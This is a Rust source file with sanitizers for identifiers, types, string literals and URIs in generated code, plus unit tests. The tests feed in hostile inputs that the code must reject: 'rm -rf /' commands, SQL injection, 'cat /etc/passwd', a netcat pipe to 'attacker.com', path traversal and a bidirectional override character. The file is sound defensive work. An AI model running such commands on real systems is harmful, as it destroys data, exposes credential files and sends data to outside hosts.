use crate::error::{ProxyError, ProxyResult};
/// Upper bound, measured in bytes (`str::len`), on identifiers accepted by
/// `sanitize_identifier`; `sanitize_type` permits type strings of up to twice this length.
const MAX_IDENTIFIER_LENGTH: usize = 128;
/// Validates that `name` can be emitted verbatim as a Rust identifier in generated code and
/// returns an owned copy of it.
///
/// # Errors
///
/// Returns a codegen error when `name`:
/// - is empty,
/// - is longer than `MAX_IDENTIFIER_LENGTH` bytes, or
/// - is not accepted by `syn` as an `Ident` (e.g. it starts with a digit, contains
///   punctuation/whitespace, or is a Rust keyword such as `fn` or `async`).
///
/// Long inputs are shortened with `truncate_for_display` before being quoted in the message.
pub fn sanitize_identifier(name: &str) -> ProxyResult<String> {
    let byte_len = name.len();

    if byte_len == 0 {
        return Err(ProxyError::codegen("Identifier cannot be empty".to_string()));
    }

    if byte_len > MAX_IDENTIFIER_LENGTH {
        let preview = truncate_for_display(name, 50);
        return Err(ProxyError::codegen(format!(
            "Identifier '{}' exceeds maximum length of {} characters",
            preview, MAX_IDENTIFIER_LENGTH
        )));
    }

    // Delegate the lexical rules (start char, allowed chars, keyword list) to syn so they stay
    // in sync with what the generated code will actually be parsed as.
    match syn::parse_str::<syn::Ident>(name) {
        Ok(_) => Ok(name.to_owned()),
        Err(parse_err) => {
            let preview = truncate_for_display(name, 50);
            Err(ProxyError::codegen(format!(
                "Invalid Rust identifier '{}': {}\n\
                 \n\
                 Identifiers must:\n\
                 - Start with a letter or underscore\n\
                 - Contain only letters, numbers, and underscores\n\
                 - Not be a Rust reserved keyword\n\
                 \n\
                 Reserved keywords include: async, await, fn, impl, let, match, struct, type, etc.\n\
                 See: https://doc.rust-lang.org/reference/keywords.html",
                preview, parse_err
            )))
        }
    }
}
/// Reports whether `s` is spelled like an identifier (an ASCII letter or `_`, followed by ASCII
/// letters, digits or `_`) but is rejected by `syn` as an `Ident`, i.e. it is a reserved word
/// such as `fn`, `async` or `struct` rather than an ordinary name.
///
/// Only ASCII word characters are considered because every Rust keyword is ASCII. Accepting
/// any Unicode alphanumeric (`char::is_alphanumeric`) would misreport strings such as `"a²"`
/// as keywords: U+00B2 is numeric but not `XID_Continue`, so `syn` rejects the string for a
/// reason that has nothing to do with keywords.
#[must_use]
pub fn is_rust_keyword(s: &str) -> bool {
    let mut chars = s.chars();
    let starts_like_ident = chars
        .next()
        .is_some_and(|c| c.is_ascii_alphabetic() || c == '_');

    // Cheap lexical checks first; only parse with syn when the string is identifier-shaped.
    starts_like_ident
        && chars.all(|c| c.is_ascii_alphanumeric() || c == '_')
        && syn::parse_str::<syn::Ident>(s).is_err()
}
/// Escapes `s` so it can be placed between double quotes in a generated Rust string literal.
///
/// - `"` and `\` are backslash-escaped.
/// - `\n`, `\r`, `\t` and `\0` use their short escape forms.
/// - Any other control character is written as a `\u{XXXX}` escape (at least 4 hex digits).
/// - Unicode bidirectional embedding/override/isolate characters (U+202A–U+202E and
///   U+2066–U+2069) are also written as `\u{XXXX}`. Left raw, they trip rustc's
///   deny-by-default `text_direction_codepoint_in_literal` lint, so the generated code would
///   not compile, and they allow "Trojan Source" visual spoofing.
///
/// The escaped literal evaluates to exactly the original string.
#[must_use]
pub fn sanitize_string_literal(s: &str) -> String {
    use std::fmt::Write;

    let mut result = String::with_capacity(s.len() + 10);
    for ch in s.chars() {
        match ch {
            '"' => result.push_str("\\\""),
            '\\' => result.push_str("\\\\"),
            '\n' => result.push_str("\\n"),
            '\r' => result.push_str("\\r"),
            '\t' => result.push_str("\\t"),
            '\0' => result.push_str("\\0"),
            ch if ch.is_control()
                || matches!(ch, '\u{202A}'..='\u{202E}' | '\u{2066}'..='\u{2069}') =>
            {
                // Writing into a `String` cannot fail, so the fmt::Result is ignored.
                let _ = write!(result, "\\u{{{:04x}}}", ch as u32);
            }
            ch => result.push(ch),
        }
    }
    result
}
/// Validates a Rust type expression (e.g. `Vec<i64>`, `HashMap<String, Value>`,
/// `serde_json::Value`) that will be spliced verbatim into generated code, and returns an owned
/// copy of it unchanged.
///
/// Two filters are applied in order:
/// 1. a blocklist of suspicious substrings (`;`, comments, braces, `()`, and the item keywords
///    `fn `, `macro `, `impl `, `trait `), reported with a pattern-specific message;
/// 2. a character whitelist of ASCII letters/digits plus `_ : < > ,` and space.
///
/// As a result, types containing `&`, `[`, `(`, `'` or `+` are not accepted.
///
/// # Errors
///
/// Returns a codegen error if `type_str` is empty or whitespace-only, is longer than
/// `2 * MAX_IDENTIFIER_LENGTH` bytes, contains a blocklisted pattern, or contains a character
/// outside the whitelist.
pub fn sanitize_type(type_str: &str) -> ProxyResult<String> {
    // Whitespace-only input would pass the whitelist below (space is allowed) and then emit an
    // empty type into generated code, so it is rejected exactly like "".
    if type_str.trim().is_empty() {
        return Err(ProxyError::codegen("Type cannot be empty".to_string()));
    }
    if type_str.len() > MAX_IDENTIFIER_LENGTH * 2 {
        return Err(ProxyError::codegen(format!(
            "Type '{}' exceeds maximum length",
            truncate_for_display(type_str, 50)
        )));
    }

    // Checked before the whitelist so callers get a more specific message for the most
    // common injection shapes.
    let dangerous_patterns = [
        ";", "//", "/*", "*/", "{", "}", "()", "fn ", "macro ", "impl ", "trait ",
    ];
    for pattern in &dangerous_patterns {
        if type_str.contains(pattern) {
            return Err(ProxyError::codegen(format!(
                "Invalid type '{}': Contains suspicious pattern '{}'",
                truncate_for_display(type_str, 50),
                pattern
            )));
        }
    }

    for ch in type_str.chars() {
        if !ch.is_ascii_alphanumeric() && !matches!(ch, '_' | ':' | '<' | '>' | ',' | ' ') {
            return Err(ProxyError::codegen(format!(
                "Invalid type '{}': Contains invalid character '{}'",
                truncate_for_display(type_str, 50),
                ch
            )));
        }
    }

    Ok(type_str.to_string())
}
/// Validates a resource URI that will be embedded in generated code, and returns an owned copy
/// of it unchanged.
///
/// Rejected characters are:
/// - control characters;
/// - `"` and `\`, which would terminate or alter an enclosing string literal
///   (NOTE(review): presumably the URI is emitted inside a `"..."` literal; confirm at call
///   site);
/// - Unicode bidirectional embedding/override/isolate characters (U+202A–U+202E,
///   U+2066–U+2069). RFC 3987 §4.1 forbids bidi formatting characters in IRIs, and raw
///   occurrences inside a Rust literal trip rustc's deny-by-default
///   `text_direction_codepoint_in_literal` lint.
///
/// # Errors
///
/// Returns a codegen error if `uri` is empty or contains a rejected character. The reported
/// position is a `char` index, not a byte offset.
pub fn sanitize_uri(uri: &str) -> ProxyResult<String> {
    if uri.is_empty() {
        return Err(ProxyError::codegen("URI cannot be empty".to_string()));
    }
    for (i, ch) in uri.chars().enumerate() {
        let is_bidi_control =
            matches!(ch, '\u{202A}'..='\u{202E}' | '\u{2066}'..='\u{2069}');
        if ch.is_control() || is_bidi_control || ch == '"' || ch == '\\' {
            return Err(ProxyError::codegen(format!(
                "Invalid URI '{}': Contains invalid character at position {} ('{}')",
                truncate_for_display(uri, 50),
                i,
                ch
            )));
        }
    }
    Ok(uri.to_string())
}
/// Shortens `s` to at most `max_len` characters for quoting in error messages, appending
/// `...` when anything was cut off.
///
/// Truncation counts `char`s rather than bytes so it never splits a multi-byte UTF-8
/// sequence. Byte-slicing `&s[..max_len]` panics when `max_len` falls inside a character,
/// and untrusted non-ASCII input can reach every error path that calls this helper.
fn truncate_for_display(s: &str, max_len: usize) -> String {
    match s.char_indices().nth(max_len) {
        // `cut` is the byte offset of the first character that does not fit, which is
        // always a valid char boundary.
        Some((cut, _)) => format!("{}...", &s[..cut]),
        None => s.to_string(),
    }
}
// Unit tests for the sanitizers in this module: accepted inputs, rejection of malformed or
// injection-shaped inputs, and the exact escaping produced by `sanitize_string_literal`.
#[cfg(test)]
mod tests {
use super::*;
// Ordinary spellings in several casing conventions, including leading underscores.
#[test]
fn test_valid_identifiers() {
assert!(sanitize_identifier("my_tool").is_ok());
assert!(sanitize_identifier("Tool123").is_ok());
assert!(sanitize_identifier("_private").is_ok());
assert!(sanitize_identifier("__internal").is_ok());
assert!(sanitize_identifier("snake_case_name").is_ok());
assert!(sanitize_identifier("PascalCase").is_ok());
assert!(sanitize_identifier("camelCase").is_ok());
assert!(sanitize_identifier("SCREAMING_SNAKE").is_ok());
}
#[test]
fn test_reject_empty_identifier() {
assert!(sanitize_identifier("").is_err());
}
// Keywords are rejected by the `syn::Ident` parse used in `sanitize_identifier`.
#[test]
fn test_reject_keywords() {
assert!(sanitize_identifier("async").is_err());
assert!(sanitize_identifier("await").is_err());
assert!(sanitize_identifier("fn").is_err());
assert!(sanitize_identifier("impl").is_err());
assert!(sanitize_identifier("let").is_err());
assert!(sanitize_identifier("match").is_err());
assert!(sanitize_identifier("struct").is_err());
assert!(sanitize_identifier("type").is_err());
}
#[test]
fn test_reject_invalid_start() {
assert!(sanitize_identifier("123invalid").is_err());
assert!(sanitize_identifier("9tool").is_err());
}
#[test]
fn test_reject_invalid_characters() {
assert!(sanitize_identifier("has-dash").is_err());
assert!(sanitize_identifier("has.dot").is_err());
assert!(sanitize_identifier("has space").is_err());
assert!(sanitize_identifier("has@symbol").is_err());
assert!(sanitize_identifier("has#hash").is_err());
assert!(sanitize_identifier("has$dollar").is_err());
}
// Inputs crafted to close a quoted/parenthesised context and inject code.
#[test]
fn test_reject_code_injection() {
assert!(sanitize_identifier(r#"evil"); system("rm -rf /"); ("#).is_err());
assert!(sanitize_identifier(r#"tool") { Command::new("rm")"#).is_err());
assert!(sanitize_identifier("'; DROP TABLE tools; --").is_err());
}
#[test]
fn test_reject_path_traversal() {
assert!(sanitize_identifier("../../../etc/passwd").is_err());
assert!(sanitize_identifier("..\\..\\windows\\system32").is_err());
}
// U+202E (RIGHT-TO-LEFT OVERRIDE) and an embedded NUL must both be rejected.
#[test]
fn test_reject_unicode_attacks() {
assert!(sanitize_identifier("evil\u{202E}code").is_err()); assert!(sanitize_identifier("test\0null").is_err());
}
// Boundary pair: exactly MAX_IDENTIFIER_LENGTH bytes is accepted, one more is rejected.
#[test]
fn test_reject_too_long() {
let too_long = "a".repeat(MAX_IDENTIFIER_LENGTH + 1);
assert!(sanitize_identifier(&too_long).is_err());
}
#[test]
fn test_accept_max_length() {
let max_length = "a".repeat(MAX_IDENTIFIER_LENGTH);
assert!(sanitize_identifier(&max_length).is_ok());
}
#[test]
fn test_sanitize_string_basic() {
assert_eq!(sanitize_string_literal("hello"), "hello");
assert_eq!(sanitize_string_literal(""), "");
}
#[test]
fn test_sanitize_string_quotes() {
assert_eq!(
sanitize_string_literal("Hello \"world\""),
"Hello \\\"world\\\""
);
assert_eq!(sanitize_string_literal("Say \"hi\""), "Say \\\"hi\\\"");
}
#[test]
fn test_sanitize_string_backslash() {
assert_eq!(
sanitize_string_literal("path\\to\\file"),
"path\\\\to\\\\file"
);
}
#[test]
fn test_sanitize_string_newlines() {
assert_eq!(sanitize_string_literal("Line 1\nLine 2"), "Line 1\\nLine 2");
assert_eq!(sanitize_string_literal("A\r\nB"), "A\\r\\nB");
}
#[test]
fn test_sanitize_string_tabs() {
assert_eq!(sanitize_string_literal("Col1\tCol2"), "Col1\\tCol2");
}
#[test]
fn test_sanitize_string_null() {
assert_eq!(sanitize_string_literal("null\0byte"), "null\\0byte");
}
// Control characters without a short escape become zero-padded 4-digit `\u{...}` escapes.
#[test]
fn test_sanitize_string_control_chars() {
assert_eq!(sanitize_string_literal("bell\x07"), "bell\\u{0007}");
}
// Every quote in the payload is escaped, so it cannot terminate the generated literal.
#[test]
fn test_sanitize_string_injection_attempt() {
let malicious = r#"description"; system("rm -rf /"); ""#;
let sanitized = sanitize_string_literal(malicious);
assert!(sanitized.contains("\\\""));
assert_eq!(sanitized, r#"description\"; system(\"rm -rf /\"); \""#);
}
// Plain, generic and path-qualified types built only from whitelisted characters.
#[test]
fn test_valid_types() {
assert!(sanitize_type("String").is_ok());
assert!(sanitize_type("i64").is_ok());
assert!(sanitize_type("Vec<i64>").is_ok());
assert!(sanitize_type("Option<String>").is_ok());
assert!(sanitize_type("HashMap<String, Value>").is_ok());
assert!(sanitize_type("serde_json::Value").is_ok());
assert!(sanitize_type("std::collections::HashMap").is_ok());
}
#[test]
fn test_reject_type_injection() {
assert!(sanitize_type("String; drop_table()").is_err());
assert!(sanitize_type("Vec<i64>; system(\"rm\")").is_err());
assert!(sanitize_type("fn() -> ()").is_err());
assert!(sanitize_type("impl Trait").is_err());
}
#[test]
fn test_reject_empty_type() {
assert!(sanitize_type("").is_err());
}
#[test]
fn test_reject_type_with_braces() {
assert!(sanitize_type("String { field: value }").is_err());
}
#[test]
fn test_reject_type_comments() {
assert!(sanitize_type("String // comment").is_err());
assert!(sanitize_type("String /* comment */").is_err());
}
#[test]
fn test_valid_uris() {
assert!(sanitize_uri("file:///test/path").is_ok());
assert!(sanitize_uri("https://example.com/api").is_ok());
assert!(sanitize_uri("http://localhost:8080/resource").is_ok());
assert!(sanitize_uri("/relative/path").is_ok());
}
#[test]
fn test_reject_empty_uri() {
assert!(sanitize_uri("").is_err());
}
#[test]
fn test_reject_uri_with_quotes() {
assert!(sanitize_uri(r#"file:///test"; system("rm");"#).is_err());
}
#[test]
fn test_reject_uri_with_control_chars() {
assert!(sanitize_uri("file:///test\npath").is_err());
assert!(sanitize_uri("file:///test\0path").is_err());
}
#[test]
fn test_is_rust_keyword() {
assert!(is_rust_keyword("async"));
assert!(is_rust_keyword("fn"));
assert!(is_rust_keyword("struct"));
assert!(!is_rust_keyword("my_function"));
assert!(!is_rust_keyword("Tool"));
}
// NOTE(review): the first case duplicates one in test_reject_code_injection.
#[test]
fn test_sql_injection_attempts() {
assert!(sanitize_identifier("'; DROP TABLE tools; --").is_err());
assert!(sanitize_identifier("admin'--").is_err());
assert!(sanitize_identifier("1' OR '1'='1").is_err());
}
#[test]
fn test_command_injection_attempts() {
assert!(sanitize_identifier("tool; rm -rf /").is_err());
assert!(sanitize_identifier("tool && cat /etc/passwd").is_err());
assert!(sanitize_identifier("tool | nc attacker.com 4444").is_err());
}
#[test]
fn test_realistic_valid_names() {
assert!(sanitize_identifier("get_user").is_ok());
assert!(sanitize_identifier("search_documents").is_ok());
assert!(sanitize_identifier("calculate_sum").is_ok());
assert!(sanitize_identifier("send_email").is_ok());
assert!(sanitize_identifier("parse_json").is_ok());
}
}